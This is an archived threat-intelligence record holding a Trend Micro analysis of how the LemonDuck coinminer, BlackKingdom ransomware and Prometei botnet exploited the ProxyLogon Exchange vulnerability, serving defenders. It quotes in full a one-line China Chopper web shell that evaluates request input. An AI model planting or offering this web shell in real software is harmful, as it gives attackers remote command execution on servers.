{
	"id": "a1f4e5c2-b285-465c-8a7a-2919c5976f5b",
	"created_at": "2026-04-06T00:15:59.273539Z",
	"updated_at": "2026-04-10T03:22:06.237165Z",
	"deleted_at": null,
	"sha1_hash": "2dfff56b76e700de011bca3be1985e5a51da5457",
	"title": "Proxylogon: A Coinminer, a Ransomware, and a Botnet Join the Party",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 641765,
	"plain_text": "Proxylogon: A Coinminer, a Ransomware, and a Botnet Join the Party\r\nPublished: 2021-05-06 · Archived: 2026-04-05 19:11:59 UTC\r\nThe emergence of several zero-day exploits relating to ProxyLogon, a Microsoft Exchange Server vulnerability that was discovered in late 2020, has allowed several threat actors to carry out attacks against unpatched systems.\r\nOur telemetry showed three malware families taking advantage of the ProxyLogon vulnerability beginning in March: the coinminer LemonDuck was sighted first, quickly followed by the ransomware BlackKingdom, then the Prometei botnet (Figure 1).\r\nFigure 1. The malware infection chains of BlackKingdom, Prometei, and LemonDuck\r\nLeveraging the ProxyLogon vulnerability allowed the threat actors behind BlackKingdom, Prometei, and LemonDuck to execute Chopper web shells (detected by Trend Micro as Backdoor.JS.CHOPPER.SMYCBCD and Trojan.ASP.CVE202126855.SM), which then led to the deployment of the final payload in their respective infections. The China Chopper web shell, which was first discovered in 2012, continues to be widely used by threat actors in their campaigns to gain remote access to a targeted system. It has recently been found in many ransomware families, such as Hello ransomware.\r\nOnce they have compromised a system, these threat actors can start deploying malicious activities, such as dropping ExchDefender.exe, a binary file seen in BlackKingdom and Prometei cases, or using a WMI modifier that leads to a LemonDuck infection.\r\nBlackKingdom and Prometei infections\r\nBoth BlackKingdom (detected by Trend Micro as Ransom.Win64.BLACKKINGDOM) and Prometei (detected as Backdoor.Win64.PROMETEI, TrojanSpy.Win32.PROMETEI, Coinminer.Win64.MALXMR, and Coinminer.Win64.TOOLXMR) infections make use of ExchDefender.exe, which copies itself to a Windows folder. It then creates MSExchangeDefenderPL, a service that contains its main routine and poses as security software for Microsoft Exchange (Figure 2). This service will execute the binary file in the Windows folder with the command line “Dcomsvc” (Figure 3).\r\nFigure 2. Code snippet of the installation of MSExchangeDefenderPL\r\nFigure 3. Code snippet of the Dcomsvc command\r\nMSExchangeDefenderPL will then start enumerating files contained in this folder: C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth.\r\nIt searches this directory for files related to web shells used in other attacks and deletes them to make sure it’s the only remaining malware in the system (Figure 4). These files are as follows:\r\nExpiredPassword.aspx\r\nfrowny.aspx\r\nlogoff.aspx\r\nlogon.aspx\r\nOutlookCN.aspx\r\nRedirSuiteServiceProxy.aspx\r\nsignout.aspx\r\nSvmFeedback.aspx\r\nFigure 4. Code snippet of the files to be deleted by MSExchangeDefenderPL\r\nAt this point, both BlackKingdom and Prometei will leverage the ProxyLogon vulnerability to deploy the Chopper web shell using a builder that modifies the Offline Address Book (OAB). Once the OAB has undergone the malicious modifications and is launched, an .ASPX web shell is created via JavaScript on the system (Figure 5). It will then connect to the virtual path to initialize the malicious web shell (Figure 6).\r\nFigure 5. JavaScript code snippet that creates the web shell\r\nFigure 6. Code snippet that executes the .ASPX web shell\r\nLemonDuck infections\r\nSimilarly, LemonDuck (detected by Trend Micro as Trojan.PS1.LEMONDUCK) capitalizes on the ProxyLogon bug to target systems, but its infection utilizes Windows Management Instrumentation (WMI) to modify the OAB. In one such WMI entry, we have observed a PowerShell process that executes a Base64-encoded command (Figure 7). Deobfuscating the command revealed that it’s capable of modifying the ExternalUrl parameter of a specific .ASPX file (Figure 8).\r\nFigure 7. The deobfuscated PowerShell\r\nFigure 8. The modified ExternalUrl parameter of an .ASPX file\r\nThis enables the remote execution of commands once the .ASPX file is loaded, a common technique used by China Chopper. The command that executes the Chopper is as follows:\r\n\u003cscript language=\"JScript\" runat=\"server\"\u003efunction Page_Load(){/*Exchange Service*/eval(Request[\"unsafe\"],\"unsafe\");}\u003c/script\u003e\r\nChina Chopper is a web shell that’s capable of receiving and executing backdoor commands. In this case, it drops the payload for the LemonDuck malware.\r\nTrend Micro solutions\r\nTrend Micro’s comprehensive XDR solution applies the most effective expert analytics to the deep data sets collected from Trend Micro solutions across the enterprise — including email, endpoints, servers, cloud workloads, and networks — making faster connections to identify and stop attacks. Powerful artificial intelligence and expert security analytics correlate data from customer environments and Trend Micro’s global threat intelligence to deliver fewer, higher-fidelity alerts, leading to better, early detection. 
One console with one source of prioritized, optimized alerts supported with guided investigation simplifies the steps needed to fully understand the attack path and impact on the organization.\r\nIndicators of compromise\r\nSource: https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html"
	],
	"report_names": [
		"proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434559,
	"ts_updated_at": 1775791326,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2dfff56b76e700de011bca3be1985e5a51da5457.pdf",
		"text": "https://archive.orkl.eu/2dfff56b76e700de011bca3be1985e5a51da5457.txt",
		"img": "https://archive.orkl.eu/2dfff56b76e700de011bca3be1985e5a51da5457.jpg"
	}
}